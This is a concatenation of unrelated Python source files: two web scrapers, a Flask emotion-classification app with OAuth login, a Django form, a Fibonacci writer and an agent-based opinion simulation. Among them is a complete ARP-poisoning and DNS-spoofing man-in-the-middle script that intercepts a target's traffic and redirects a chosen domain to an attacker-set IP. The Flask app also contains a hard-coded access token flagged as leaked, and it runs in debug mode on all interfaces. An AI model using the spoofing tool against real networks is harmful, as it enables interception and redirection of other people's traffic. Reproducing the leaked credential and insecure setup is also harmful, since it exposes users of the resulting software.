                    flash("File : %s , Line : %d, Func.Name : %s, Message : %s" % (
                        trace[0], trace[1], trace[2], trace[3]))
                data = test_data
                flash(str(e))
                flash(error)
                print("Exception type : %s " % ex_type.__name__)
                print("Exception message : %s" % ex_value)
                print("Stack trace : %s" % stack_trace)
                flash("Exception type : %s " % ex_type.__name__)
                flash("Exception message : %s" % ex_value)
            pieJSON, barJSON, lineJSON = get_test_plot(data)
            resp = make_response(render_template('notdash.html', pieJSON=pieJSON, barJSON=barJSON, lineJSON=lineJSON))
            # Refresh the token cookie for another two years
            resp.set_cookie('access_token', at, max_age=60 * 60 * 24 * 365 * 2)
            return resp
        else:
            return render_template('login.html')
    @app.route('/get_songs_history')
    def songs_history():
        """Returns the raw per-track statistics as JSON."""
        # NOTE(review): hard-coded access token looks like a debugging
        # leftover (and a leaked credential) -- it also makes the following
        # 'if' always true; remove/rotate before deploying
        session['access_token'] = 'AgAAAAAh7Vk7AAG8XtDkZzG_PEYLjGVYMIVdDQE'
        if 'access_token' in session:
            num_tracks = int(request.args.get('n'))
            final_chart_json = SongProcessing.get_user_stats(session['access_token'],
                                                             num_tracks,
                                                             sd_model)
            return final_chart_json, 200
        else:
            return redirect('/')
    @app.route('/dash_test', methods=['GET', 'POST'])
    def notdash():
        """Debug page rendering plots.

        NOTE(review): get_test_plot is called with the access token instead
        of a stats dict, and returns three values while only two are
        unpacked -- this route appears broken; confirm whether it is still
        used."""
        pieJSON, barJSON = get_test_plot(session['access_token'])
        return render_template('notdash.html', pieJSON=pieJSON, barJSON=barJSON)
    @app.route('/api/get_text_emotions', methods=['POST'])
    @cross_origin()
    def text_emotions():
        """Classifies the emotions of a single text passed as JSON {'text': ...}."""
        if request.method == "POST":
            request_data = request.get_json()
            text = request_data['text']
            # The model consumes a CSV file; write the text to a unique one
            fn = f'dl/data/data{uuid.uuid4()}.csv'
            with open(fn, 'w') as f:
                f.write('text\n'+text.replace("\n", " "))
            res = sd_model.classify(fn)
            print(res)
            return {'result': str(res)}, 200
        return jsonify({
            'statusCode': 400
        }), 400
    @app.route('/api/get_text_emotions_batch', methods=['POST'])
    @cross_origin()
    def text_emotions_batch():
        """Classifies a batch of texts passed as JSON {'texts': [...]}."""
        if request.method == "POST":
            request_data = request.get_json()
            texts = request_data['texts']
            fn = f'dl/data/data{uuid.uuid4()}.csv'
            with open(fn, 'w') as f:
                f.write('text\n')
                for t in texts:
                    # One CSV row per text, newlines flattened, quotes escaped
                    f.write('"'+t.replace("\n", " ").replace('"', '\\"')+'"\n')
            res = np.round(sd_model.classify(fn)[1], 2)
            print(res)
            return {'result': str(res)}, 200
        return jsonify({
            'statusCode': 400
        }), 400
    def get_client(code):
        """Exchanges an OAuth authorization code for a Yandex access token."""
        token_auth_uri = f"https://oauth.yandex.ru/token"
        headers = {
            'Content-type': 'application/x-www-form-urlencoded',
        }
        query = {
            'grant_type': 'authorization_code',
            'code': code,
            'client_id': client_id,
            'client_secret': client_secret,
        }
        query = urllib.parse.urlencode(query)
        resp = requests.post(token_auth_uri, data=query, headers=headers)
        print(resp.text)
        rj = resp.json()
        return rj['access_token']
    def get_client_from_cred(un, pwd):
        """Obtains an access token directly from username/password credentials."""
        return Client.from_credentials(un, pwd).token
    @app.route('/auth', methods=['POST', 'GET'])
    @cross_origin()
    def auth():
        """Login endpoint: GET handles the OAuth redirect (?code=...),
        POST handles the username/password form."""
        if request.method == "GET":
            code = request.args.get('code')
            token = get_client(code)
            session['access_token'] = token
            return redirect('/')
        elif request.method == "POST":
            username = request.form.get('username')
            password = request.form.get('password')
            error = None
            if not username:
                error = 'Введите логин'
            elif not password:
                error = 'Введите пароль'
            if error is None:
                try:
                    token = get_client_from_cred(username, password)
                    session['access_token'] = token
                    resp = make_response(redirect('/'))
                    # Persist the token as a cookie for two years
                    resp.set_cookie('access_token', token, max_age=60 * 60 * 24 * 365 * 2)
                    return resp
                except Exception as e:
                    flash(str(e))
                    error = "Неудалось войти... Вероятный диагноз -- неверный пароль("
            flash(error)
            return render_template('login.html')
    @app.route('/logout', methods=['POST', 'GET'])
    @cross_origin()
    def logout():
        """Clears the session and expires the access-token cookie."""
        session.clear()
        resp = make_response(redirect(url_for('main_page')))
        resp.set_cookie('access_token', '', expires=0)
        return resp
    return app
if __name__ == "__main__":
    # Development server entry point (threaded, debug enabled)
    app = create_app()
    app.run(host='0.0.0.0', debug=True, threaded=True)
|
997,710 | eaa343eb6ed95e7307d889eb87e740cf350bd684 | from bs4 import BeautifulSoup
import requests
import json
def gather_urls():
    """Scrapes the politico.com front page and returns hrefs of figure links."""
    response = requests.get("http://www.politico.com/")
    soup = BeautifulSoup(response.text, 'html.parser')
    links = []
    for div in soup.find_all('div', class_='fig-graphic'):
        anchor = div.find('a')
        if anchor:
            links.append(anchor['href'])
    return links
def parse_data(url):
    """Fetches a page and extracts its embedded data blob plus timestamps.

    Returns the parsed JSON dict, augmented with 'created_at' and
    'updated_at' taken from the page's <time> elements.
    """
    soup = BeautifulSoup(requests.get(url).text, 'html.parser')
    created_at = soup.find('p', class_='timestamp').find('time')['datetime']
    updated_at = soup.find('p', class_='updated').find('time')['datetime']
    # The 14th script tag holds "var x = {...};" -- keep everything after
    # the assignment and before the first semicolon
    raw_script = soup.findAll('script')[13].string
    js_string = raw_script.split(';')[0].split('= ')[1].strip()
    data = json.loads(js_string)
    data['created_at'] = created_at
    data['updated_at'] = updated_at
    return data
|
997,711 | 7bbd8a519f59ff891290a7011fb74f65a152f697 | from django import forms
class CreateForm(forms.Form):
    """Post-creation form: a title line plus a body textarea."""
    # Bootstrap's 'form-control' class is applied via the widget attrs
    title = forms.CharField(label='Title', max_length=300, widget=forms.TextInput(attrs={'class': 'form-control'}))
    text = forms.CharField(label='Text', widget=forms.Textarea(attrs={'class': 'form-control'}))
|
997,712 | 907fd2b337ddfd4b661b1ac2ecc8f48242e3c3ca | fout=open('fib.txt','wt')
def fib(num, out=None):
    """Writes the first num Fibonacci numbers as "index value" lines.

    num: how many numbers to emit (emits at least one).
    out: optional writable text stream; defaults to the module-level
         fout file, preserving the original behaviour.
    """
    if out is None:
        out = fout
    count = 1
    a = 1
    b = 1
    print(count, a, file=out)
    while(count < num):
        # Advance the pair: a takes b's value, b becomes their sum
        a, b = b, a+b
        count += 1
        print(count, a, file=out)
# Emit the first 1000 Fibonacci numbers, then close the output file
fib(1000)
fout.close()
997,713 | 54b9bb8a20b775fbff396831746a265eb1a51362 | """
MITM DNS Poisoning script
Developed by:
- Hiro
- Hiram
"""
from scapy.all import *
from collections import deque
import threading
import time
import sys
"""
Poisons gateway's and client's ARP tables, so packets are redirected the
attacker machine.
"""
class ARPPoisonThread(threading.Thread):
    """Thread that ARP-poisons a target and its gateway so their traffic
    flows through the attacker; join() restores the real ARP entries."""
    def __init__( self,\
                  targetip,\
                  gatewayip,\
                  name='arpoison'
                ):
        """ constructor, setting initial variables """
        # NOTE(review): _stopevent and _sleepperiod are never used (run()
        # loops forever on a hard-coded 5s sleep) -- confirm before removing
        self._stopevent = threading.Event( )
        self._sleepperiod = 1.0
        threading.Thread.__init__(self, name=name)
        self.targetip = targetip
        self.gatewayip = gatewayip
    def _getmac(self, targetip):
        # Broadcast a who-has ARP request and read the MAC from the reply
        arppacket = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=targetip)
        targetmac = srp(arppacket)[0][0][1].hwsrc
        return targetmac
    def _poisonarpcache(self, targetip, targetmac, sourceip):
        # Forged is-at reply: makes targetip map sourceip to OUR MAC
        spoofed = ARP(op=2 , pdst=targetip, psrc=sourceip, hwdst= targetmac)
        send(spoofed)
    def _restorearp(self, targetip, targetmac, sourceip, sourcemac):
        # Legitimate is-at reply re-associating sourceip with its real MAC
        packet = ARP( op=2,\
                      hwsrc=sourcemac,\
                      psrc= sourceip,\
                      hwdst= targetmac,\
                      pdst= targetip)
        send(packet)
        print ("ARP Table restored to normal for", targetip)
    def run(self):
        """Resolves both MACs, then re-poisons both caches every 5 seconds."""
        # NOTE(review): bare except hides the real failure cause; quit()
        # inside a thread raises SystemExit in this thread only
        try:
            self.targetmac = self._getmac(self.targetip)
        except:
            print("Target machine did not respond to ARP broadcast")
            quit()
        try:
            self.gatewaymac= self._getmac(self.gatewayip)
        except:
            print("Gateway is unreachable")
            quit()
        print ("Sending spoofed ARP replies")
        while True:
            time.sleep(5)
            self._poisonarpcache(self.targetip, self.targetmac, self.gatewayip)
            self._poisonarpcache(self.gatewayip, self.gatewaymac, self.targetip)
    def join(self, timeout=None):
        """Restores both ARP tables before joining the thread."""
        print ("ARP spoofing stopped")
        self._restorearp( self.gatewayip,\
                          self.gatewaymac,\
                          self.targetip,\
                          self.targetmac)
        self._restorearp( self.targetip,\
                          self.targetmac,\
                          self.gatewayip,\
                          self.gatewaymac)
        threading.Thread.join(self, timeout)
class DNSPoisonThread(threading.Thread):
    """Thread that sniffs the target's DNS queries and forges responses for
    queries whose name contains the configured site string."""
    def __init__( self,\
            site,\
            targetip,\
            name='dnspoison'):
        """ constructor, setting initial variables """
        threading.Thread.__init__(self, name=name)
        # Substring matched against the queried domain name.
        self.site = site
        # IPv4 address (string) of the host whose DNS traffic is sniffed.
        self.targetip = targetip
    def _analysis(self, packet):
        #Performs checks, whether DNS response contains our gold or not.
        if self.site in packet[DNSQR].qname.decode('UTF-8'):
            # Forged reply: swap Ethernet/IP/UDP endpoints of the query and
            # answer with a single A record.
            # NOTE(review): the answer address 23.96.35.235 is hard-coded here;
            # the CLI's 'poisonip' argument is never wired through to this class.
            udp_packet = (Ether(src=packet[Ether].dst, dst=packet[Ether].src, type = "IPv4")
                /IP(ihl = packet[IP].ihl, src=packet[IP].dst, dst= packet[IP].src, ttl = packet[IP].ttl, chksum = None)
                /UDP(sport=53, dport=packet[UDP].sport, len = None, chksum = None)
                /DNS(id=packet[DNS].id, rd=1, qr=1, ra=1, z=0, rcode=0,qdcount=1, ancount=1, nscount=0, arcount=0,qd = DNSQR(qname = packet[DNSQR].qname, qtype = "A", qclass="IN"),an=DNSRR(rrname=packet[DNSQR].qname, rdata= "23.96.35.235",type="A",rclass="IN", ttl=174)))
            udp_packet.show()
            sendp(udp_packet)
    def run(self):
        #Only do packet sniffing
        # Capture only UDP port-53 traffic originating from the target.
        sniff( filter=f'ip src {self.targetip} and udp port 53',\
            prn=self._analysis)
    def join(self, timeout=None):
        threading.Thread.join(self, timeout)
import argparse
def args():
    """Parse the four positional command-line arguments and return the
    resulting argparse namespace."""
    parser = argparse.ArgumentParser()
    # Declaration order matters: these are positional arguments.
    for dest, meta, text in (
            ('gatewayip', 'G', 'IP address of the gateway'),
            ('targetip', 'T', 'IP address of the target'),
            ('site', 'S', 'Domain to be spoofed'),
            ('poisonip', 'P', 'New IP for the domain')):
        parser.add_argument(dest, metavar=meta, help=text)
    return parser.parse_args()
def main(args):
    """Start the ARP-poisoning thread, then the DNS-poisoning sniffer, and
    spin until Ctrl-C, at which point join() restores the ARP tables."""
    targetip = args.targetip
    gatewayip = args.gatewayip
    site = args.site
    poisonip = args.poisonip
    # NOTE(review): poisonip is only echoed here; DNSPoisonThread never
    # receives it and answers with its own hard-coded address instead.
    print(f"Will spoof {targetip} of gateway {gatewayip} for site {site} as {poisonip}")
    try:
        arp_poison = ARPPoisonThread(targetip, gatewayip)
        dns_poison = DNSPoisonThread(site, targetip)
        arp_poison.start()
        # Give the ARP poisoning a head start before sniffing DNS traffic.
        time.sleep(5)
        dns_poison.start()
        while True:
            time.sleep(.1)
    except KeyboardInterrupt:
        # Ctrl-C path: ARPPoisonThread.join restores both ARP caches.
        arp_poison.join()
        dns_poison.join()
if __name__ == "__main__":
main(args())
|
997,714 | 1346f251bfa849f1cf5cd0a49b1e19e66044226c | import numpy
import scipy
import math
import sys
import getopt
import random
from scipy import spatial
from scipy.special import erfinv
import copy
import networkx as nx
# This simulation scheme follows ISO spherical coordinate system convention.
# - angle_t(theta) := polar angle [0, pi]
# - angle_p(phi) := azimuth angle [0, 2*pi]
# Static variables (Hard-coded). ---------------------------------------
Instance_Count = 50
Angle_Lower_Bound = 0.003935
Angle_Upper_Bound = 3.126928
Max_Performance = 10 + math.sqrt(40/3)*erfinv( math.cos(Angle_Lower_Bound) ) # approx 21.5472
Min_Performance = 10 + math.sqrt(40/3)*erfinv( math.cos(Angle_Upper_Bound) ) # approx 0.0001
Approx_30p_Angle = 2.548343 # approx 10.7736
Approx_50p_Angle = 1.333029 # approx 10.7736
Approx_60p_Angle = 0.732863 # approx 12.9283
Approx_70p_Angle = 0.314320 # approx 15.083
Approx_80p_Angle = 0.100644 # approx 17.2377
Approx_90p_Angle = 0.023457 # approx 19.3924
## Explicit equation for angles x
## sqrt(40/3)*erfinv( cos(x) ) = P * ( sqrt(40/3)*erfinv( cos(LB) ) - sqrt(40/3)*erfinv( cos(UB) )) + sqrt(40/3)*erfinv( cos(UB) )
## sqrt(40/3)*erfinv( cos(x) ) = P * ( sqrt(40/3)*erfinv( cos(0.003935) ) - sqrt(40/3)*erfinv( cos(3.126928) )) + sqrt(40/3)*erfinv( cos(3.126928) )
# ----------------------------------------------------------------------
def normal_performance(opinion, answer):
    """Performance of *opinion* against the market vector *answer*: 10 plus a
    Gaussian-quantile transform of the cosine of the angle between them."""
    # Assume market vector is not fixed.
    deviation = angle_between(opinion, answer)
    # NOTE(review): under Python 2 the literal 40/3 truncates to 13; the
    # module's Max/Min performance constants use the exact same expression,
    # so the normalization elsewhere remains self-consistent either way.
    return 10 + math.sqrt(40/3)*erfinv( math.cos(deviation) )
def opinion_init(number_of_nodes, condition):
    """Draw initial agent opinions uniformly on a band of the unit sphere.

    number_of_nodes -- how many [theta, phi] pairs to generate.
    condition       -- initialization pattern (1-11) selecting the band of
                       initial performance; conditions 9 and 10 additionally
                       restrict the azimuth to a narrow wedge.

    Returns a list of [polar angle, azimuth angle] pairs (ISO convention).
    Raises ValueError for an unknown condition (the original if/elif chain
    silently left the angles as None and crashed later).
    """
    def cap(angle, shift=0.0):
        # u = (cos(angle)+1)/2: sampling u uniformly and taking
        # arccos(2u - 1) yields points uniform on the spherical cap.
        return 0.5 * (numpy.cos(angle + shift) + 1)

    # condition -> (lower u bound, upper u bound, fraction of full azimuth).
    # The 0.05 azimuth fraction was written as 1/20 originally, which
    # truncates to 0 under Python 2 integer division and froze phi at 0;
    # 1.0/20 restores the intended narrow-wedge sampling on both Pythons.
    bands = {
        1: (cap(Approx_50p_Angle), 1.0, 1.0),                     # perf in [50%, 100%]
        2: (cap(Approx_60p_Angle), 1.0, 1.0),                     # perf in [60%, 100%]
        3: (cap(Approx_50p_Angle), cap(Approx_60p_Angle), 1.0),   # perf in [50%, 60%]
        4: (0.0, cap(Approx_50p_Angle), 1.0),                     # perf in [0%, 50%]
        5: (0.0, cap(Approx_60p_Angle), 1.0),                     # perf in [0%, 60%]
        6: (0.0, cap(Approx_70p_Angle), 1.0),                     # perf in [0%, 70%]
        7: (0.0, cap(Approx_80p_Angle), 1.0),                     # perf in [0%, 80%]
        8: (0.0, cap(Approx_90p_Angle), 1.0),                     # perf in [0%, 90%]
        9: (cap(Approx_50p_Angle), cap(Approx_60p_Angle), 1.0/20),  # [50%, 60%], narrow phi
        10: (0.0, cap(Approx_60p_Angle), 1.0/20),                 # [0%, 60%], narrow phi
        11: (0.0, cap(Approx_50p_Angle, 0.2), 1.0),               # approx [0%, 47%]
    }
    if condition not in bands:
        raise ValueError("unknown initialization condition: %r" % (condition,))
    low_u, high_u, phi_fraction = bands[condition]
    # Same RNG call order as the original: the theta batch first, then phi.
    angle_t = numpy.arccos(2 * numpy.random.uniform(low_u, high_u, number_of_nodes) - 1)
    angle_p = 2 * math.pi * numpy.random.uniform(0, phi_fraction, number_of_nodes)
    return [[angle_t[i], angle_p[i]] for i in range(number_of_nodes)]
def spherical2cartesian(a):
    """Convert a unit-length spherical coordinate [theta, phi] (ISO
    convention: theta polar, phi azimuth) to a Cartesian [x, y, z] list."""
    theta, phi = a[0], a[1]
    sin_theta = numpy.sin(theta)
    return [sin_theta*numpy.cos(phi), sin_theta*numpy.sin(phi), numpy.cos(theta)]
def arc_midpoint(a, b):
    """Midpoint of the great-circle arc between two unit spherical points,
    returned as a [theta, phi] pair."""
    cart_a = spherical2cartesian(a)
    cart_b = spherical2cartesian(b)
    # Chord midpoint in Cartesian space, then renormalized onto the sphere.
    chord_mid = [(p + q)/2 for p, q in zip(cart_a, cart_b)]
    magnitude = numpy.sqrt(chord_mid[0]**2 + chord_mid[1]**2 + chord_mid[2]**2)
    # arctan2 keeps the azimuth in the correct quadrant.
    return [numpy.arccos(chord_mid[2]/magnitude),
            numpy.arctan2(chord_mid[1], chord_mid[0])]
def learning(opinion_a, opinion_b, param):
    """Move from opinion_a toward opinion_b by param/8 of the connecting arc,
    built recursively from repeated arc bisection."""
    if param == 4:  ## 50%, 4/8 -- base case: plain arc midpoint
        return arc_midpoint(opinion_a, opinion_b)
    if param == 1:  ## 12.5%, 1/8
        return arc_midpoint(opinion_a, learning(opinion_a, opinion_b, 2))
    if param == 2:  ## 25%, 2/8
        return arc_midpoint(opinion_a, learning(opinion_a, opinion_b, 4))
    if param == 3:  ## 37.5%, 3/8
        return arc_midpoint(learning(opinion_a, opinion_b, 2), learning(opinion_a, opinion_b, 4))
    if param == 5:  ## 62.5%, 5/8
        return arc_midpoint(learning(opinion_a, opinion_b, 4), learning(opinion_a, opinion_b, 6))
    if param == 6:  ## 75%, 6/8
        return arc_midpoint(learning(opinion_a, opinion_b, 4), opinion_b)
    if param == 7:  ## 87.5%, 7/8
        return arc_midpoint(learning(opinion_a, opinion_b, 6), opinion_b)
    # Any other param falls through to None, exactly like the original chain.
    return None
def angle_between(a, b):
    """Angle in radians between two unit vectors given as [theta, phi]
    spherical coordinates."""
    cosine = numpy.inner( spherical2cartesian(a), spherical2cartesian(b) )
    return numpy.arccos(cosine)
def standardize(a):
    """Fold a mutable [theta, phi] pair back into canonical ranges in place
    and return the same list: theta into [0, pi] (single reflection), phi
    into [0, 2*pi] (single wrap), and theta clamped strictly off the poles."""
    theta, phi = a[0], a[1]
    # Reflect the polar angle back into range (one fold, as in the original).
    if theta > math.pi:
        theta = 2*math.pi - theta
    if theta < 0:
        theta = -theta
    # Wrap the azimuth once in each direction.
    if phi > 2*math.pi:
        phi = phi - 2*math.pi
    if phi < 0:
        phi = 2*math.pi + phi
    # Keep theta away from the exact poles so downstream erfinv stays finite.
    if theta < 0.003935:
        theta = 0.003935
    if theta > 3.137657:
        theta = 3.137657
    a[0] = theta
    a[1] = phi
    return a
def simulator(input_option):
    """Run Instance_Count independent simulations of agents learning on a
    sphere against a moving market vector; returns [mean convergence,
    variance of convergence] over the instances."""
    # input_option := [NodeCount, SearchRange, LearningRate, Behavior, InitCondition]
    # 1. NodeCount := Indicates the number agents in the system (organization).
    # 2. SearchRange := Represents the search range of each agent's learning activity.
    #                   It is an upper limit of angle between two opinions.
    # 3. LearningRate := Represents the learning rate of each agent.
    #                    In this simulation, it is {25%, 50%, 75%}.
    # 4. Behavior := Represents the degree of randomness in the learning process.
    # 5. InitCondition := Represents the type of knowledge initialization pattern.
    # 6. marketFileName:= File name of market vector movement.
    NodeCount = int(input_option[0])
    SearchRange = float(input_option[1])
    LearningRate = int(input_option[2])
    BehaviorParameter = float(input_option[3])
    InitCondition = int(input_option[4])
    convergence_log = []
    elapsed_time_log = []
    # NOTE(review): market_file is never closed.
    market_file = open(input_option[5], 'r')
    market_data = []
    # 201 comma-separated market vectors, one per line.
    for i in range(0, 201):
        market_data.append( [float(x) for x in market_file.readline().split(",")] )
    # [START] Simulations ----------------------------------------------
    for instance in range(0, Instance_Count):
        ## initialize market coordinate
        market = [0.0, 0.0]
        ## initialize opinions
        opinion = opinion_init(NodeCount, InitCondition)
        performance_log = []
        flag = 0
        time = 0
        mind = 0
        stop = False
        current_performance = [0]*NodeCount
        # Track trajectories only for the first instance of condition 4.
        if instance < 0.001 and InitCondition == 4:
            # NOTE(review): SearchRange is a float, so this string
            # concatenation raises TypeError when the guard is true;
            # should be repr(SearchRange).
            trackFile = open('./geonsik_result_track'+SearchRange+'.txt', 'w')
        ##while(stop == False):
        # Fixed-length run: the stop-flag loop above is disabled, so `stop`
        # below is computed but never ends the loop early.
        while(time < 1000):
            # Market vector advances every 5 time steps.
            mind = int((time-1)/5)
            market = market_data[mind]
            # Step 1. Evaluation
            performance_log.append(sum(current_performance)/((Max_Performance-Min_Performance)*NodeCount))
            for i in range(0, NodeCount):
                current_performance[i] = normal_performance(opinion[i], market)
            if time == 0:
                print "max!!", max(current_performance)/(Max_Performance-Min_Performance)
            if instance < 0.001 and InitCondition == 4:
                for i in range(0, NodeCount):
                    cart = spherical2cartesian(opinion[i])
                    trackFile.write(repr(time)+","+",".join(str(x) for x in cart)+'\n');
            #        print opinion[i], " ::::", current_performance[i]
            #print "----------------"
            #print time, " ",max(current_performance/(Max_Performance-Min_Performance))
            # Step 2. Learning.
            new_opinion = [[0 for v1 in range(2)] for v2 in range(NodeCount)]
            for i in range(0, NodeCount):
                # Step 2-1. Search and Assimilate.
                # Find the best-performing neighbor within the search cone.
                best_value = current_performance[i]
                best_index = i
                for j in range(0, NodeCount):
                    if ( angle_between(opinion[i], opinion[j]) < SearchRange*math.pi ) \
                    and current_performance[j] > best_value:
                        #if current_performance[j] > best_value:
                        best_value = current_performance[j]
                        best_index = j
                #print best_index, " ",best_value/(Max_Performance-Min_Performance)
                if i != best_index:
                    new_opinion[i] = learning(opinion[i], opinion[best_index], LearningRate)
                else:
                    new_opinion[i] = opinion[i]
                #print "---------"
                #print opinion[i]
                #print opinion[best_index]
                #print new_opinion[i]
                #print "---------"
                # Step 2-2. Add Perturbation.
                for j in range(0, 2):
                    new_opinion[i][j] += numpy.random.uniform(-BehaviorParameter, +BehaviorParameter)
                # Step 2-3. Standardize.
                new_opinion[i] = standardize(new_opinion[i])
            # Deep copy so next iteration's reads don't alias this buffer.
            opinion = copy.deepcopy(new_opinion)
            # Step 3. Record Time and Check Exit Condition.
            time += 1
            if (len(performance_log) > 2) and (abs(performance_log[-1] - performance_log[-2]) < 0.002):
                flag += 1
            #else:
            #    flag = 0
            if flag > 4:
                stop = True;
            if sum(current_performance)/((Max_Performance-Min_Performance)*NodeCount) > 0.95:
                stop = True;
            #if time%100 == 0:
            #    print sum(current_performance)/((Max_Performance-Min_Performance)*NodeCount), " ", best_value/(Max_Performance-Min_Performance)
            #if (len(performance_log) > 2):
            #    print performance_log[-1]
            #if time > 100:
            #    stop = True;
        org_performance = sum(current_performance)/((Max_Performance-Min_Performance)*NodeCount)
        print "Convergence = ", org_performance, ", Elapsed Time = ", time
        convergence_log.append(org_performance)
        elapsed_time_log.append(time)
    # [END] Simulations ------------------------------------------------
    # return average statistics of instances under given conditions.
    ##return [sum(convergence_log)/len(convergence_log), sum(elapsed_time_log)/(1.0*len(elapsed_time_log))]
    return [sum(convergence_log)/len(convergence_log), numpy.var(convergence_log)]
def main(argv=None):
    """Command-line driver: seeds the RNG and runs one of three hard-coded
    experiment sweeps (only Experiment 3 is enabled).  This file is
    Python 2 (print statements, old except syntax)."""
    if argv is None:
        argv = sys.argv
    # parse command line options
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h", ["help"])
    except getopt.error, msg:
        print msg
        print "for help use --help"
        sys.exit(2)
    # process arguments
    NodeCount = 0
    Neighbor = 0
    LearningRate = 0
    BehaviorParameter = 0
    ## set random seed.
    # Fixed seed for reproducible runs.
    numpy.random.seed(1)
    if len(args) > 0:
        NodeCount = int(args[0])
    if len(args) > 1:
        Neighbor = int(args[1])
    if len(args) > 2:
        LearningRate = float(args[2])
    if len(args) > 3:
        BehaviorParameter = float(args[3])
    ##org_option = [NodeCount, LearningRate, BehaviorParameter]
    #for BP in [0.0, 0.05, 0.1, 0.15, 0.20, 0.25, 0.3, 0.35, 0.4]:
    condition = 11
    ##f = open('./geonsik_result'+repr(condition)+'.txt', 'w')
    ##for BP in [0.0, 0.01, 0.02, 0.03, 0.04, 0.05, 0.1, 0.15, 0.20, 0.25, 0.3, 0.35, 0.4]:
    ##for BP in [0.0, 0.1, 0.2, 0.3, 0.4, 0.5]:
    ##for BP in [0.0, 0.4, 0.8, 1.2, 1.6]:
    ##for BP in [0.0]:
    # NOTE(review): Experiments 1 and 2 write to `f`, but the `f = open(...)`
    # line above is commented out, so enabling either branch raises NameError.
    if False: ## Experiment 1: Effect of Randomness
        L = 3
        for BP in [0.0, 0.01, 0.02, 0.03, 0.04, 0.05]:
            print BP
            for condition in [11, 4,5,6,7]:
                org_option = [40, 1, L, BP, condition]
                # input_option := [NodeCount, SearchRange, LearningRate, Behavior, InitCondition]
                result = simulator(org_option)
                f.write(repr(condition)+","+repr(BP)+","+repr(result[0])+","+repr(result[1])+'\n');
    ## --------------------------------------------------------------------------------------------
    if False: ## Experiment 2: Value of Slow Learning
        BP = 0
        ##for L in [12.5, 25, 37.5, 50, 62.5, 75]:
        for L in [1,2,3,4,5,6,7]:
            for condition in [11, 4,5,6,7]:
                org_option = [40, 1, L, BP, condition]
                # input_option := [NodeCount, SearchRange, LearningRate, Behavior, InitCondition]
                result = simulator(org_option)
                f.write(repr(condition)+","+repr(BP)+","+repr(L)+","+repr(result[0])+","+repr(result[1])+'\n');
    ## --------------------------------------------------------------------------------------------
    if True: ## Experiment 3: Value of
        BP = 0
        L = 3
        market_file = "./market_simga2.0/market0_mu0.0_sigma2.0.txt"
        ## market_file = "./market_simga2.0/market0_mu0.0_sigma2.0.txt"
        for condition in [11, 4,5,6,7]:
            ##for searchRange in [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1]:
            #for searchRange in [0.1, 0,2]5
            for searchRange in [0.9, 1]:
                # NOTE(review): a new file is opened per searchRange without
                # closing the previous handle; only the last open file is
                # closed by f.close() below, and each reopen truncates.
                f = open('./geonsik_result'+repr(searchRange)+'.txt', 'w')
                org_option = [40, searchRange, L, BP, condition, market_file]
                # input_option := [NodeCount, SearchRange, LearningRate, Behavior, InitCondition]
                result = simulator(org_option)
                f.write(repr(condition)+","+repr(searchRange)+","+repr(result[0])+","+repr(result[1])+'\n');
    ## --------------------------------------------------------------------------------------------
    f.close()
if __name__ == "__main__":
main() |
997,715 | 0a86eece0ea3fac9a12f3ac71ab7f0534f884f37 | print ("%s is a string, %d is a decimal %.3f is a floating no. upto 3 decimal no. place")
|
997,716 | c1e4eb02911180b65833df1278727565cf19a8f5 | import argparse
#import requests
import time
import pandas as pd
#import os
from pathlib import Path
from bs4 import BeautifulSoup
from selenium import webdriver
from random import randrange
# Scraper script: fetch the UNFCCC national inventory submissions page for one
# year (URL layout differs by year), collect ZIP download links directly and
# via per-document sub-pages, and write the result as a CSV.
max_tries = 10
root = Path(__file__).parents[1]
descr = ("Download UNFCCC National Inventory Submissions lists "
         "and create list of submissions as CSV file")
parser = argparse.ArgumentParser(description=descr)
parser.add_argument(
    'year',
    help='Year to download'
)
args = parser.parse_args()
year = args.year
print("Fetching submissions for {}".format(year))
# Default URL layout (pre-2019); later years moved the page.
url = (
    "https://unfccc.int/process/transparency-and-reporting/"
    "reporting-and-review-under-the-convention/"
    "greenhouse-gas-inventories-annex-i-parties/"
    "submissions/national-inventory-submissions-{}".format(year)
)
if int(year) == 2019:
    url = (
        "https://unfccc.int/process-and-meetings/transparency-and-reporting/"
        "reporting-and-review-under-the-convention/"
        "greenhouse-gas-inventories-annex-i-parties/"
        "national-inventory-submissions-{}".format(year)
    )
if int(year) >= 2020:
    url = (
        "https://unfccc.int/ghg-inventories-annex-i-parties/{}".format(year)
    )
print(url)
#result = requests.get(url)
# set options for headless mode
options = webdriver.firefox.options.Options()
options.add_argument('-headless')
# create profile for headless mode and automatical downloading
profile = webdriver.FirefoxProfile()
# set up selenium driver
driver = webdriver.Firefox(options = options, firefox_profile = profile)
driver.get(url)
html = BeautifulSoup(driver.page_source, "html.parser")
table = html.find("table")
# check if table found. if not the get command didn't work, likely because of a captcha on the site
### TODO replace by error message
if not(table):
    # try to load htm file from disk
    print('Download failed, trying to load manually downloaded file')
    file = open("manual_page_downloads/National-Inventory-Submissions-{}.html".format(year))
    content = file.read()
    html = BeautifulSoup(content, "html.parser")
    table = html.find("table")
    if not(table):
        print("Manually downloaded file " + "manual_page_downloads/National-Inventory-Submissions-{}.html".format(year) +
              " not found")
        exit()
links = table.findAll('a')
targets = [] # sub-pages
downloads = []
no_downloads = []
# Check links for Zipfiles or subpages
for link in links:
    if "href" not in link.attrs:
        continue
    href = link.attrs["href"]
    if "/documents/" in href:
        if "title" in link.attrs.keys():
            title = link.attrs["title"]
        else:
            title = link.contents[0]
        # Relative document links need the site prefix.
        if href.startswith("/documents"):
            href = "https://unfccc.int" + href
        # Only add pages in the format https://unfccc.int/documents/65587
        # to further downloads
        if str(Path(href).parent).endswith("documents"):
            targets.append({"title": title, "url": href})
    elif href.endswith(".zip"):
        if href.startswith("/files"):
            href = "https://unfccc.int" + href
        # Country code is the first dash-separated token of the file name.
        country = Path(href).name.split("-")[0].upper()
        title = "{} {}".format(country, link.contents[0])
        print("\t".join([title, href]))
        downloads.append({"Title": title, "URL": href})
# Go through sub-pages.
for target in targets:
    # Randomized delay between requests to avoid being rate-limited.
    time.sleep(randrange(5, 15))
    url = target["url"]
    i = 0
    while i < max_tries:
        try:
            #subpage = requests.get(url, timeout=15.5)
            #html = BeautifulSoup(subpage.content, "html.parser")
            driver.get(url)
            html = BeautifulSoup(driver.page_source, "html.parser")
            title = html.find("h1").contents[0]
            break
        except AttributeError:
            # find("h1") returned None: the page didn't load properly; retry.
            print("Error fetching " + target["url"])
            print("Retrying ...")
            time.sleep(randrange(5, 15))
            i += 1
